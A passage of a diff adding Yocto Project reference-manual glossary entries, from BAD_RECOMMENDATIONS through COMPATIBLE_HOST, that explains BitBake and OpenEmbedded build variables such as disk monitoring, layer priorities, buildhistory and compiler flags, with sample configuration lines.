+      with the ``BAD_RECOMMENDATIONS`` variable:
+      ::
+
+         BAD_RECOMMENDATIONS = "package_name package_name package_name ..."
+
+      You can set this variable globally in your ``local.conf`` file or you
+      can attach it to a specific image recipe by using the recipe name
+      override:
+      ::
+
+         BAD_RECOMMENDATIONS_pn-target_image = "package_name"
+
+      It is important to realize that if you choose to not install packages
+      using this variable and some other packages are dependent on them
+      (i.e. listed in a recipe's :term:`RDEPENDS`
+      variable), the OpenEmbedded build system ignores your request and
+      will install the packages to avoid dependency errors.
+
+      Support for this variable exists only when using the IPK and RPM
+      packaging backend. Support does not exist for DEB.
+
+      See the :term:`NO_RECOMMENDATIONS` and the
+      :term:`PACKAGE_EXCLUDE` variables for related
+      information.
+
+   :term:`BASE_LIB`
+      The library directory name for the CPU or Application Binary
+      Interface (ABI) tune. The ``BASE_LIB`` applies only in the Multilib
+      context. See the ":ref:`dev-manual/dev-manual-common-tasks:combining multiple versions of library files into one image`"
+      section in the Yocto Project Development Tasks Manual for information
+      on Multilib.
+
+      The ``BASE_LIB`` variable is defined in the machine include files in
+      the :term:`Source Directory`. If Multilib is not
+      being used, the value defaults to "lib".
+
+   :term:`BASE_WORKDIR`
+      Points to the base of the work directory for all recipes. The default
+      value is "${TMPDIR}/work".
+
+   :term:`BB_ALLOWED_NETWORKS`
+      Specifies a space-delimited list of hosts that the fetcher is allowed
+      to use to obtain the required source code. Following are
+      considerations surrounding this variable:
+
+      -  This host list is only used if ``BB_NO_NETWORK`` is either not set
+         or set to "0".
+
+      -  Limited support for wildcard matching against the beginning of
+         host names exists. For example, the following setting matches
+         ``git.gnu.org``, ``ftp.gnu.org``, and ``foo.git.gnu.org``.
+         ::
+
+            BB_ALLOWED_NETWORKS = "*.gnu.org"
+
+         .. note::
+
+            The use of the "``*``" character only works at the beginning of
+            a host name and it must be isolated from the remainder of the
+            host name. You cannot use the wildcard character in any other
+            location of the name or combined with the front part of the
+            name.
+
+            For example, ``*.foo.bar`` is supported, while ``*aa.foo.bar``
+            is not.
+
+      -  Mirrors not in the host list are skipped and logged in debug.
+
+      -  Attempts to access networks not in the host list cause a failure.
+
+      Using ``BB_ALLOWED_NETWORKS`` in conjunction with
+      :term:`PREMIRRORS` is very useful. Adding the host
+      you want to use to ``PREMIRRORS`` results in the source code being
+      fetched from an allowed location and avoids raising an error when a
+      host that is not allowed is in a :term:`SRC_URI`
+      statement. This is because the fetcher does not attempt to use the
+      host listed in ``SRC_URI`` after a successful fetch from the
+      ``PREMIRRORS`` occurs.
+
+   :term:`BB_DANGLINGAPPENDS_WARNONLY`
+      Defines how BitBake handles situations where an append file
+      (``.bbappend``) has no corresponding recipe file (``.bb``). This
+      condition often occurs when layers get out of sync (e.g. ``oe-core``
+      bumps a recipe version and the old recipe no longer exists and the
+      other layer has not been updated to the new version of the recipe
+      yet).
+
+      The default fatal behavior is safest because it is the sane reaction
+      given something is out of sync. It is important to realize when your
+      changes are no longer being applied.
+
+      You can change the default behavior by setting this variable to "1",
+      "yes", or "true" in your ``local.conf`` file, which is located in the
+      :term:`Build Directory`: Here is an example:
+      ::
+
+         BB_DANGLINGAPPENDS_WARNONLY = "1"
+
+   :term:`BB_DISKMON_DIRS`
+      Monitors disk space and available inodes during the build and allows
+      you to control the build based on these parameters.
+
+      Disk space monitoring is disabled by default. To enable monitoring,
+      add the ``BB_DISKMON_DIRS`` variable to your ``conf/local.conf`` file
+      found in the :term:`Build Directory`. Use the
+      following form:
+
+      .. code-block:: none
+
+         BB_DISKMON_DIRS = "action,dir,threshold [...]"
+
+         where:
+
+            action is:
+               ABORT:     Immediately abort the build when
+                          a threshold is broken.
+               STOPTASKS: Stop the build after the currently
+                          executing tasks have finished when
+                          a threshold is broken.
+               WARN:      Issue a warning but continue the
+                          build when a threshold is broken.
+                          Subsequent warnings are issued as
+                          defined by the BB_DISKMON_WARNINTERVAL
+                          variable, which must be defined in
+                          the conf/local.conf file.
+
+            dir is:
+               Any directory you choose. You can specify one or
+               more directories to monitor by separating the
+               groupings with a space.  If two directories are
+               on the same device, only the first directory
+               is monitored.
+
+            threshold is:
+               Either the minimum available disk space,
+               the minimum number of free inodes, or
+               both.  You must specify at least one.  To
+               omit one or the other, simply omit the value.
+               Specify the threshold using G, M, K for Gbytes,
+               Mbytes, and Kbytes, respectively. If you do
+               not specify G, M, or K, Kbytes is assumed by
+               default.  Do not use GB, MB, or KB.
+
+      Here are some examples:
+      ::
+
+         BB_DISKMON_DIRS = "ABORT,${TMPDIR},1G,100K WARN,${SSTATE_DIR},1G,100K"
+         BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},1G"
+         BB_DISKMON_DIRS = "ABORT,${TMPDIR},,100K"
+
+      The first example works only if you also provide the
+      :term:`BB_DISKMON_WARNINTERVAL`
+      variable in the ``conf/local.conf``. This example causes the build
+      system to immediately abort when either the disk space in
+      ``${TMPDIR}`` drops below 1 Gbyte or the available free inodes drops
+      below 100 Kbytes. Because two directories are provided with the
+      variable, the build system also issue a warning when the disk space
+      in the ``${SSTATE_DIR}`` directory drops below 1 Gbyte or the number
+      of free inodes drops below 100 Kbytes. Subsequent warnings are issued
+      during intervals as defined by the ``BB_DISKMON_WARNINTERVAL``
+      variable.
+
+      The second example stops the build after all currently executing
+      tasks complete when the minimum disk space in the ``${TMPDIR}``
+      directory drops below 1 Gbyte. No disk monitoring occurs for the free
+      inodes in this case.
+
+      The final example immediately aborts the build when the number of
+      free inodes in the ``${TMPDIR}`` directory drops below 100 Kbytes. No
+      disk space monitoring for the directory itself occurs in this case.
+
+   :term:`BB_DISKMON_WARNINTERVAL`
+      Defines the disk space and free inode warning intervals. To set these
+      intervals, define the variable in your ``conf/local.conf`` file in
+      the :term:`Build Directory`.
+
+      If you are going to use the ``BB_DISKMON_WARNINTERVAL`` variable, you
+      must also use the :term:`BB_DISKMON_DIRS`
+      variable and define its action as "WARN". During the build,
+      subsequent warnings are issued each time disk space or number of free
+      inodes further reduces by the respective interval.
+
+      If you do not provide a ``BB_DISKMON_WARNINTERVAL`` variable and you
+      do use ``BB_DISKMON_DIRS`` with the "WARN" action, the disk
+      monitoring interval defaults to the following:
+      ::
+
+         BB_DISKMON_WARNINTERVAL = "50M,5K"
+
+      When specifying the variable in your configuration file, use the
+      following form:
+
+      .. code-block:: none
+
+         BB_DISKMON_WARNINTERVAL = "disk_space_interval,disk_inode_interval"
+
+         where:
+
+            disk_space_interval is:
+               An interval of memory expressed in either
+               G, M, or K for Gbytes, Mbytes, or Kbytes,
+               respectively. You cannot use GB, MB, or KB.
+
+            disk_inode_interval is:
+               An interval of free inodes expressed in either
+               G, M, or K for Gbytes, Mbytes, or Kbytes,
+               respectively. You cannot use GB, MB, or KB.
+
+      Here is an example:
+      ::
+
+         BB_DISKMON_DIRS = "WARN,${SSTATE_DIR},1G,100K"
+         BB_DISKMON_WARNINTERVAL = "50M,5K"
+
+      These variables cause the
+      OpenEmbedded build system to issue subsequent warnings each time the
+      available disk space further reduces by 50 Mbytes or the number of
+      free inodes further reduces by 5 Kbytes in the ``${SSTATE_DIR}``
+      directory. Subsequent warnings based on the interval occur each time
+      a respective interval is reached beyond the initial warning (i.e. 1
+      Gbytes and 100 Kbytes).
+
+   :term:`BB_GENERATE_MIRROR_TARBALLS`
+      Causes tarballs of the source control repositories (e.g. Git
+      repositories), including metadata, to be placed in the
+      :term:`DL_DIR` directory.
+
+      For performance reasons, creating and placing tarballs of these
+      repositories is not the default action by the OpenEmbedded build
+      system.
+      ::
+
+         BB_GENERATE_MIRROR_TARBALLS = "1"
+
+      Set this variable in your
+      ``local.conf`` file in the :term:`Build Directory`.
+
+      Once you have the tarballs containing your source files, you can
+      clean up your ``DL_DIR`` directory by deleting any Git or other
+      source control work directories.
+
+   :term:`BB_NUMBER_THREADS`
+      The maximum number of tasks BitBake should run in parallel at any one
+      time. The OpenEmbedded build system automatically configures this
+      variable to be equal to the number of cores on the build system. For
+      example, a system with a dual core processor that also uses
+      hyper-threading causes the ``BB_NUMBER_THREADS`` variable to default
+      to "4".
+
+      For single socket systems (i.e. one CPU), you should not have to
+      override this variable to gain optimal parallelism during builds.
+      However, if you have very large systems that employ multiple physical
+      CPUs, you might want to make sure the ``BB_NUMBER_THREADS`` variable
+      is not set higher than "20".
+
+      For more information on speeding up builds, see the
+      ":ref:`dev-manual/dev-manual-common-tasks:speeding up a build`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`BB_SERVER_TIMEOUT`
+      Specifies the time (in seconds) after which to unload the BitBake
+      server due to inactivity. Set ``BB_SERVER_TIMEOUT`` to determine how
+      long the BitBake server stays resident between invocations.
+
+      For example, the following statement in your ``local.conf`` file
+      instructs the server to be unloaded after 20 seconds of inactivity:
+      ::
+
+         BB_SERVER_TIMEOUT = "20"
+
+      If you want the server to never be unloaded,
+      set ``BB_SERVER_TIMEOUT`` to "-1".
+
+   :term:`BBCLASSEXTEND`
+      Allows you to extend a recipe so that it builds variants of the
+      software. Common variants for recipes exist such as "natives" like
+      ``quilt-native``, which is a copy of Quilt built to run on the build
+      system; "crosses" such as ``gcc-cross``, which is a compiler built to
+      run on the build machine but produces binaries that run on the target
+      :term:`MACHINE`; "nativesdk", which targets the SDK
+      machine instead of ``MACHINE``; and "mulitlibs" in the form
+      "``multilib:``\ multilib_name".
+
+      To build a different variant of the recipe with a minimal amount of
+      code, it usually is as simple as adding the following to your recipe:
+      ::
+
+         BBCLASSEXTEND =+ "native nativesdk"
+         BBCLASSEXTEND =+ "multilib:multilib_name"
+
+      .. note::
+
+         Internally, the ``BBCLASSEXTEND`` mechanism generates recipe
+         variants by rewriting variable values and applying overrides such
+         as ``_class-native``. For example, to generate a native version of
+         a recipe, a :term:`DEPENDS` on "foo" is rewritten
+         to a ``DEPENDS`` on "foo-native".
+
+         Even when using ``BBCLASSEXTEND``, the recipe is only parsed once.
+         Parsing once adds some limitations. For example, it is not
+         possible to include a different file depending on the variant,
+         since ``include`` statements are processed when the recipe is
+         parsed.
+
+   :term:`BBFILE_COLLECTIONS`
+      Lists the names of configured layers. These names are used to find
+      the other ``BBFILE_*`` variables. Typically, each layer will append
+      its name to this variable in its ``conf/layer.conf`` file.
+
+   :term:`BBFILE_PATTERN`
+      Variable that expands to match files from
+      :term:`BBFILES` in a particular layer. This variable
+      is used in the ``conf/layer.conf`` file and must be suffixed with the
+      name of the specific layer (e.g. ``BBFILE_PATTERN_emenlow``).
+
+   :term:`BBFILE_PRIORITY`
+      Assigns the priority for recipe files in each layer.
+
+      This variable is useful in situations where the same recipe appears
+      in more than one layer. Setting this variable allows you to
+      prioritize a layer against other layers that contain the same recipe
+      - effectively letting you control the precedence for the multiple
+      layers. The precedence established through this variable stands
+      regardless of a recipe's version (:term:`PV` variable). For
+      example, a layer that has a recipe with a higher ``PV`` value but for
+      which the ``BBFILE_PRIORITY`` is set to have a lower precedence still
+      has a lower precedence.
+
+      A larger value for the ``BBFILE_PRIORITY`` variable results in a
+      higher precedence. For example, the value 6 has a higher precedence
+      than the value 5. If not specified, the ``BBFILE_PRIORITY`` variable
+      is set based on layer dependencies (see the ``LAYERDEPENDS`` variable
+      for more information. The default priority, if unspecified for a
+      layer with no dependencies, is the lowest defined priority + 1 (or 1
+      if no priorities are defined).
+
+      .. tip::
+
+         You can use the command ``bitbake-layers show-layers``
+         to list all configured layers along with their priorities.
+
+   :term:`BBFILES`
+      A space-separated list of recipe files BitBake uses to build
+      software.
+
+      When specifying recipe files, you can pattern match using Python's
+      `glob <https://docs.python.org/3/library/glob.html>`_ syntax.
+      For details on the syntax, see the documentation by following the
+      previous link.
+
+   :term:`BBFILES_DYNAMIC`
+      Activates content when identified layers are present. You identify
+      the layers by the collections that the layers define.
+
+      Use the ``BBFILES_DYNAMIC`` variable to avoid ``.bbappend`` files
+      whose corresponding ``.bb`` file is in a layer that attempts to
+      modify other layers through ``.bbappend`` but does not want to
+      introduce a hard dependency on those other layers.
+
+      Use the following form for ``BBFILES_DYNAMIC``:
+      collection_name:filename_pattern The following example identifies two
+      collection names and two filename patterns:
+      ::
+
+         BBFILES_DYNAMIC += " \
+            clang-layer:${LAYERDIR}/bbappends/meta-clang/*/*/*.bbappend \
+            core:${LAYERDIR}/bbappends/openembedded-core/meta/*/*/*.bbappend \
+            "
+
+      This next example shows an error message that occurs because invalid
+      entries are found, which cause parsing to abort:
+
+      .. code-block:: none
+
+         ERROR: BBFILES_DYNAMIC entries must be of the form <collection name>:<filename pattern>, not:
+             /work/my-layer/bbappends/meta-security-isafw/*/*/*.bbappend
+             /work/my-layer/bbappends/openembedded-core/meta/*/*/*.bbappend
+
+   :term:`BBINCLUDELOGS`
+      Variable that controls how BitBake displays logs on build failure.
+
+   :term:`BBINCLUDELOGS_LINES`
+      If :term:`BBINCLUDELOGS` is set, specifies the
+      maximum number of lines from the task log file to print when
+      reporting a failed task. If you do not set ``BBINCLUDELOGS_LINES``,
+      the entire log is printed.
+
+   :term:`BBLAYERS`
+      Lists the layers to enable during the build. This variable is defined
+      in the ``bblayers.conf`` configuration file in the :term:`Build Directory`.
+      Here is an example:
+      ::
+
+         BBLAYERS = " \
+             /home/scottrif/poky/meta \
+             /home/scottrif/poky/meta-poky \
+             /home/scottrif/poky/meta-yocto-bsp \
+             /home/scottrif/poky/meta-mykernel \
+             "
+
+      This example enables four layers, one of which is a custom,
+      user-defined layer named ``meta-mykernel``.
+
+   :term:`BBMASK`
+      Prevents BitBake from processing recipes and recipe append files.
+
+      You can use the ``BBMASK`` variable to "hide" these ``.bb`` and
+      ``.bbappend`` files. BitBake ignores any recipe or recipe append
+      files that match any of the expressions. It is as if BitBake does not
+      see them at all. Consequently, matching files are not parsed or
+      otherwise used by BitBake.
+
+      The values you provide are passed to Python's regular expression
+      compiler. Consequently, the syntax follows Python's Regular
+      Expression (re) syntax. The expressions are compared against the full
+      paths to the files. For complete syntax information, see Python's
+      documentation at https://docs.python.org/3/library/re.html#regular-expression-syntax.
+
+      The following example uses a complete regular expression to tell
+      BitBake to ignore all recipe and recipe append files in the
+      ``meta-ti/recipes-misc/`` directory:
+      ::
+
+         BBMASK = "meta-ti/recipes-misc/"
+
+      If you want to mask out multiple directories or recipes, you can
+      specify multiple regular expression fragments. This next example
+      masks out multiple directories and individual recipes: ::
+
+         BBMASK += "/meta-ti/recipes-misc/ meta-ti/recipes-ti/packagegroup/"
+         BBMASK += "/meta-oe/recipes-support/"
+         BBMASK += "/meta-foo/.*/openldap"
+         BBMASK += "opencv.*\.bbappend"
+         BBMASK += "lzma"
+
+      .. note::
+
+         When specifying a directory name, use the trailing slash character
+         to ensure you match just that directory name.
+
+   :term:`BBMULTICONFIG`
+      Specifies each additional separate configuration when you are
+      building targets with multiple configurations. Use this variable in
+      your ``conf/local.conf`` configuration file. Specify a
+      multiconfigname for each configuration file you are using. For
+      example, the following line specifies three configuration files:
+      ::
+
+         BBMULTICONFIG = "configA configB configC"
+
+      Each configuration file you
+      use must reside in the :term:`Build Directory`
+      ``conf/multiconfig`` directory (e.g.
+      build_directory\ ``/conf/multiconfig/configA.conf``).
+
+      For information on how to use ``BBMULTICONFIG`` in an environment
+      that supports building targets with multiple configurations, see the
+      ":ref:`dev-building-images-for-multiple-targets-using-multiple-configurations`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`BBPATH`
+      Used by BitBake to locate ``.bbclass`` and configuration files. This
+      variable is analogous to the ``PATH`` variable.
+
+      .. note::
+
+         If you run BitBake from a directory outside of the
+         Build Directory
+         , you must be sure to set
+         BBPATH
+         to point to the Build Directory. Set the variable as you would any
+         environment variable and then run BitBake:
+         ::
+
+                 $ BBPATH = "build_directory"
+                 $ export BBPATH
+                 $ bitbake target
+
+
+   :term:`BBSERVER`
+      If defined in the BitBake environment, ``BBSERVER`` points to the
+      BitBake remote server.
+
+      Use the following format to export the variable to the BitBake
+      environment:
+      ::
+
+         export BBSERVER=localhost:$port
+
+      By default, ``BBSERVER`` also appears in
+      :term:`bitbake:BB_HASHBASE_WHITELIST`.
+      Consequently, ``BBSERVER`` is excluded from checksum and dependency
+      data.
+
+   :term:`BINCONFIG`
+      When inheriting the
+      :ref:`binconfig-disabled <ref-classes-binconfig-disabled>` class,
+      this variable specifies binary configuration scripts to disable in
+      favor of using ``pkg-config`` to query the information. The
+      ``binconfig-disabled`` class will modify the specified scripts to
+      return an error so that calls to them can be easily found and
+      replaced.
+
+      To add multiple scripts, separate them by spaces. Here is an example
+      from the ``libpng`` recipe:
+      ::
+
+         BINCONFIG = "${bindir}/libpng-config ${bindir}/libpng16-config"
+
+   :term:`BINCONFIG_GLOB`
+      When inheriting the :ref:`binconfig <ref-classes-binconfig>` class,
+      this variable specifies a wildcard for configuration scripts that
+      need editing. The scripts are edited to correct any paths that have
+      been set up during compilation so that they are correct for use when
+      installed into the sysroot and called by the build processes of other
+      recipes.
+
+      .. note::
+
+         The ``BINCONFIG_GLOB`` variable uses
+         `shell globbing <https://tldp.org/LDP/abs/html/globbingref.html>`__,
+         which is recognition and expansion of wildcards during pattern
+         matching. Shell globbing is very similar to
+         `fnmatch <https://docs.python.org/3/library/fnmatch.html#module-fnmatch>`__
+         and `glob <https://docs.python.org/3/library/glob.html>`__.
+
+      For more information on how this variable works, see
+      ``meta/classes/binconfig.bbclass`` in the :term:`Source Directory`.
+      You can also find general
+      information on the class in the
+      ":ref:`binconfig.bbclass <ref-classes-binconfig>`" section.
+
+   :term:`BP`
+      The base recipe name and version but without any special recipe name
+      suffix (i.e. ``-native``, ``lib64-``, and so forth). ``BP`` is
+      comprised of the following:
+      ::
+
+         ${BPN}-${PV}
+
+   :term:`BPN`
+      This variable is a version of the :term:`PN` variable with
+      common prefixes and suffixes removed, such as ``nativesdk-``,
+      ``-cross``, ``-native``, and multilib's ``lib64-`` and ``lib32-``.
+      The exact lists of prefixes and suffixes removed are specified by the
+      :term:`MLPREFIX` and
+      :term:`SPECIAL_PKGSUFFIX` variables,
+      respectively.
+
+   :term:`BUGTRACKER`
+      Specifies a URL for an upstream bug tracking website for a recipe.
+      The OpenEmbedded build system does not use this variable. Rather, the
+      variable is a useful pointer in case a bug in the software being
+      built needs to be manually reported.
+
+   :term:`BUILD_ARCH`
+      Specifies the architecture of the build host (e.g. ``i686``). The
+      OpenEmbedded build system sets the value of ``BUILD_ARCH`` from the
+      machine name reported by the ``uname`` command.
+
+   :term:`BUILD_AS_ARCH`
+      Specifies the architecture-specific assembler flags for the build
+      host. By default, the value of ``BUILD_AS_ARCH`` is empty.
+
+   :term:`BUILD_CC_ARCH`
+      Specifies the architecture-specific C compiler flags for the build
+      host. By default, the value of ``BUILD_CC_ARCH`` is empty.
+
+   :term:`BUILD_CCLD`
+      Specifies the linker command to be used for the build host when the C
+      compiler is being used as the linker. By default, ``BUILD_CCLD``
+      points to GCC and passes as arguments the value of
+      :term:`BUILD_CC_ARCH`, assuming
+      ``BUILD_CC_ARCH`` is set.
+
+   :term:`BUILD_CFLAGS`
+      Specifies the flags to pass to the C compiler when building for the
+      build host. When building in the ``-native`` context,
+      :term:`CFLAGS` is set to the value of this variable by
+      default.
+
+   :term:`BUILD_CPPFLAGS`
+      Specifies the flags to pass to the C preprocessor (i.e. to both the C
+      and the C++ compilers) when building for the build host. When
+      building in the ``-native`` context, :term:`CPPFLAGS`
+      is set to the value of this variable by default.
+
+   :term:`BUILD_CXXFLAGS`
+      Specifies the flags to pass to the C++ compiler when building for the
+      build host. When building in the ``-native`` context,
+      :term:`CXXFLAGS` is set to the value of this variable
+      by default.
+
+   :term:`BUILD_FC`
+      Specifies the Fortran compiler command for the build host. By
+      default, ``BUILD_FC`` points to Gfortran and passes as arguments the
+      value of :term:`BUILD_CC_ARCH`, assuming
+      ``BUILD_CC_ARCH`` is set.
+
+   :term:`BUILD_LD`
+      Specifies the linker command for the build host. By default,
+      ``BUILD_LD`` points to the GNU linker (ld) and passes as arguments
+      the value of :term:`BUILD_LD_ARCH`, assuming
+      ``BUILD_LD_ARCH`` is set.
+
+   :term:`BUILD_LD_ARCH`
+      Specifies architecture-specific linker flags for the build host. By
+      default, the value of ``BUILD_LD_ARCH`` is empty.
+
+   :term:`BUILD_LDFLAGS`
+      Specifies the flags to pass to the linker when building for the build
+      host. When building in the ``-native`` context,
+      :term:`LDFLAGS` is set to the value of this variable
+      by default.
+
+   :term:`BUILD_OPTIMIZATION`
+      Specifies the optimization flags passed to the C compiler when
+      building for the build host or the SDK. The flags are passed through
+      the :term:`BUILD_CFLAGS` and
+      :term:`BUILDSDK_CFLAGS` default values.
+
+      The default value of the ``BUILD_OPTIMIZATION`` variable is "-O2
+      -pipe".
+
+   :term:`BUILD_OS`
+      Specifies the operating system in use on the build host (e.g.
+      "linux"). The OpenEmbedded build system sets the value of
+      ``BUILD_OS`` from the OS reported by the ``uname`` command - the
+      first word, converted to lower-case characters.
+
+   :term:`BUILD_PREFIX`
+      The toolchain binary prefix used for native recipes. The OpenEmbedded
+      build system uses the ``BUILD_PREFIX`` value to set the
+      :term:`TARGET_PREFIX` when building for
+      ``native`` recipes.
+
+   :term:`BUILD_STRIP`
+      Specifies the command to be used to strip debugging symbols from
+      binaries produced for the build host. By default, ``BUILD_STRIP``
+      points to
+      ``${``\ :term:`BUILD_PREFIX`\ ``}strip``.
+
+   :term:`BUILD_SYS`
+      Specifies the system, including the architecture and the operating
+      system, to use when building for the build host (i.e. when building
+      ``native`` recipes).
+
+      The OpenEmbedded build system automatically sets this variable based
+      on :term:`BUILD_ARCH`,
+      :term:`BUILD_VENDOR`, and
+      :term:`BUILD_OS`. You do not need to set the
+      ``BUILD_SYS`` variable yourself.
+
+   :term:`BUILD_VENDOR`
+      Specifies the vendor name to use when building for the build host.
+      The default value is an empty string ("").
+
+   :term:`BUILDDIR`
+      Points to the location of the :term:`Build Directory`.
+      You can define this directory indirectly through the
+      :ref:`structure-core-script` script by passing in a Build
+      Directory path when you run the script. If you run the script and do
+      not provide a Build Directory path, the ``BUILDDIR`` defaults to
+      ``build`` in the current directory.
+
+   :term:`BUILDHISTORY_COMMIT`
+      When inheriting the :ref:`buildhistory <ref-classes-buildhistory>`
+      class, this variable specifies whether or not to commit the build
+      history output in a local Git repository. If set to "1", this local
+      repository will be maintained automatically by the ``buildhistory``
+      class and a commit will be created on every build for changes to each
+      top-level subdirectory of the build history output (images, packages,
+      and sdk). If you want to track changes to build history over time,
+      you should set this value to "1".
+
+      By default, the ``buildhistory`` class does not commit the build
+      history output in a local Git repository:
+      ::
+
+         BUILDHISTORY_COMMIT ?= "0"
+
+   :term:`BUILDHISTORY_COMMIT_AUTHOR`
+      When inheriting the :ref:`buildhistory <ref-classes-buildhistory>`
+      class, this variable specifies the author to use for each Git commit.
+      In order for the ``BUILDHISTORY_COMMIT_AUTHOR`` variable to work, the
+      :term:`BUILDHISTORY_COMMIT` variable must
+      be set to "1".
+
+      Git requires that the value you provide for the
+      ``BUILDHISTORY_COMMIT_AUTHOR`` variable takes the form of "name
+      email@host". Providing an email address or host that is not valid
+      does not produce an error.
+
+      By default, the ``buildhistory`` class sets the variable as follows:
+      ::
+
+         BUILDHISTORY_COMMIT_AUTHOR ?= "buildhistory <buildhistory@${DISTRO}>"
+
+   :term:`BUILDHISTORY_DIR`
+      When inheriting the :ref:`buildhistory <ref-classes-buildhistory>`
+      class, this variable specifies the directory in which build history
+      information is kept. For more information on how the variable works,
+      see the ``buildhistory.class``.
+
+      By default, the ``buildhistory`` class sets the directory as follows:
+      ::
+
+         BUILDHISTORY_DIR ?= "${TOPDIR}/buildhistory"
+
+   :term:`BUILDHISTORY_FEATURES`
+      When inheriting the :ref:`buildhistory <ref-classes-buildhistory>`
+      class, this variable specifies the build history features to be
+      enabled. For more information on how build history works, see the
+      ":ref:`dev-manual/dev-manual-common-tasks:maintaining build output quality`"
+      section in the Yocto Project Development Tasks Manual.
+
+      You can specify these features in the form of a space-separated list:
+
+      -  *image:* Analysis of the contents of images, which includes the
+         list of installed packages among other things.
+
+      -  *package:* Analysis of the contents of individual packages.
+
+      -  *sdk:* Analysis of the contents of the software development kit
+         (SDK).
+
+      -  *task:* Save output file signatures for
+         :ref:`shared state <overview-manual/overview-manual-concepts:shared state cache>`
+         (sstate) tasks.
+         This saves one file per task and lists the SHA-256 checksums for
+         each file staged (i.e. the output of the task).
+
+      By default, the ``buildhistory`` class enables the following
+      features:
+      ::
+
+         BUILDHISTORY_FEATURES ?= "image package sdk"
+
+   :term:`BUILDHISTORY_IMAGE_FILES`
+      When inheriting the :ref:`buildhistory <ref-classes-buildhistory>`
+      class, this variable specifies a list of paths to files copied from
+      the image contents into the build history directory under an
+      "image-files" directory in the directory for the image, so that you
+      can track the contents of each file. The default is to copy
+      ``/etc/passwd`` and ``/etc/group``, which allows you to monitor for
+      changes in user and group entries. You can modify the list to include
+      any file. Specifying an invalid path does not produce an error.
+      Consequently, you can include files that might not always be present.
+
+      By default, the ``buildhistory`` class provides paths to the
+      following files:
+      ::
+
+         BUILDHISTORY_IMAGE_FILES ?= "/etc/passwd /etc/group"
+
+   :term:`BUILDHISTORY_PUSH_REPO`
+      When inheriting the :ref:`buildhistory <ref-classes-buildhistory>`
+      class, this variable optionally specifies a remote repository to
+      which build history pushes Git changes. In order for
+      ``BUILDHISTORY_PUSH_REPO`` to work,
+      :term:`BUILDHISTORY_COMMIT` must be set to
+      "1".
+
+      The repository should correspond to a remote address that specifies a
+      repository as understood by Git, or alternatively to a remote name
+      that you have set up manually using ``git remote`` within the local
+      repository.
+
+      By default, the ``buildhistory`` class sets the variable as follows:
+      ::
+
+         BUILDHISTORY_PUSH_REPO ?= ""
+
+   :term:`BUILDSDK_CFLAGS`
+      Specifies the flags to pass to the C compiler when building for the
+      SDK. When building in the ``nativesdk-`` context,
+      :term:`CFLAGS` is set to the value of this variable by
+      default.
+
+   :term:`BUILDSDK_CPPFLAGS`
+      Specifies the flags to pass to the C pre-processor (i.e. to both the
+      C and the C++ compilers) when building for the SDK. When building in
+      the ``nativesdk-`` context, :term:`CPPFLAGS` is set
+      to the value of this variable by default.
+
+   :term:`BUILDSDK_CXXFLAGS`
+      Specifies the flags to pass to the C++ compiler when building for the
+      SDK. When building in the ``nativesdk-`` context,
+      :term:`CXXFLAGS` is set to the value of this variable
+      by default.
+
+   :term:`BUILDSDK_LDFLAGS`
+      Specifies the flags to pass to the linker when building for the SDK.
+      When building in the ``nativesdk-`` context,
+      :term:`LDFLAGS` is set to the value of this variable
+      by default.
+
+   :term:`BUILDSTATS_BASE`
+      Points to the location of the directory that holds build statistics
+      when you use and enable the
+      :ref:`buildstats <ref-classes-buildstats>` class. The
+      ``BUILDSTATS_BASE`` directory defaults to
+      ``${``\ :term:`TMPDIR`\ ``}/buildstats/``.
+
+   :term:`BUSYBOX_SPLIT_SUID`
+      For the BusyBox recipe, specifies whether to split the output
+      executable file into two parts: one for features that require
+      ``setuid root``, and one for the remaining features (i.e. those that
+      do not require ``setuid root``).
+
+      The ``BUSYBOX_SPLIT_SUID`` variable defaults to "1", which results in
+      splitting the output executable file. Set the variable to "0" to get
+      a single output executable file.
+
+   :term:`CACHE`
+      Specifies the directory BitBake uses to store a cache of the
+      :term:`Metadata` so it does not need to be parsed every time
+      BitBake is started.
+
+   :term:`CC`
+      The minimal command and arguments used to run the C compiler.
+
+   :term:`CFLAGS`
+      Specifies the flags to pass to the C compiler. This variable is
+      exported to an environment variable and thus made visible to the
+      software being built during the compilation step.
+
+      Default initialization for ``CFLAGS`` varies depending on what is
+      being built:
+
+      -  :term:`TARGET_CFLAGS` when building for the
+         target
+
+      -  :term:`BUILD_CFLAGS` when building for the
+         build host (i.e. ``-native``)
+
+      -  :term:`BUILDSDK_CFLAGS` when building for
+         an SDK (i.e. ``nativesdk-``)
+
+   :term:`CLASSOVERRIDE`
+      An internal variable specifying the special class override that
+      should currently apply (e.g. "class-target", "class-native", and so
+      forth). The classes that use this variable (e.g.
+      :ref:`native <ref-classes-native>`,
+      :ref:`nativesdk <ref-classes-nativesdk>`, and so forth) set the
+      variable to appropriate values.
+
+      .. note::
+
+         ``CLASSOVERRIDE`` gets its default "class-target" value from the
+         ``bitbake.conf`` file.
+
+      As an example, the following override allows you to install extra
+      files, but only when building for the target:
+      ::
+
+         do_install_append_class-target() {
+             install my-extra-file ${D}${sysconfdir}
+         }
+
+      Here is an example where ``FOO`` is set to
+      "native" when building for the build host, and to "other" when not
+      building for the build host:
+      ::
+
+         FOO_class-native = "native"
+         FOO = "other"
+
+      The underlying mechanism behind ``CLASSOVERRIDE`` is simply
+      that it is included in the default value of
+      :term:`OVERRIDES`.
+
+   :term:`CLEANBROKEN`
+      If set to "1" within a recipe, ``CLEANBROKEN`` specifies that the
+      ``make clean`` command does not work for the software being built.
+      Consequently, the OpenEmbedded build system will not try to run
+      ``make clean`` during the :ref:`ref-tasks-configure`
+      task, which is the default behavior.
+
+   :term:`COMBINED_FEATURES`
+      Provides a list of hardware features that are enabled in both
+      :term:`MACHINE_FEATURES` and
+      :term:`DISTRO_FEATURES`. This select list of
+      features contains features that make sense to be controlled both at
+      the machine and distribution configuration level. For example, the
+      "bluetooth" feature requires hardware support but should also be
+      optional at the distribution level, in case the hardware supports
+      Bluetooth but you do not ever intend to use it.
+
+   :term:`COMMON_LICENSE_DIR`
+      Points to ``meta/files/common-licenses`` in the
+      :term:`Source Directory`, which is where generic license
+      files reside.
+
+   :term:`COMPATIBLE_HOST`
+      A regular expression that resolves to one or more hosts (when the
+      recipe is native) or one or more targets (when the recipe is
+      non-native) with which a recipe is compatible. The regular expression
+      is matched against :term:`HOST_SYS`. You can use the
+      variable to stop recipes from being built for classes of systems with
+      which the recipes are not compatible. Stopping these builds is
+      particularly useful with kernels. The variable also helps to increase
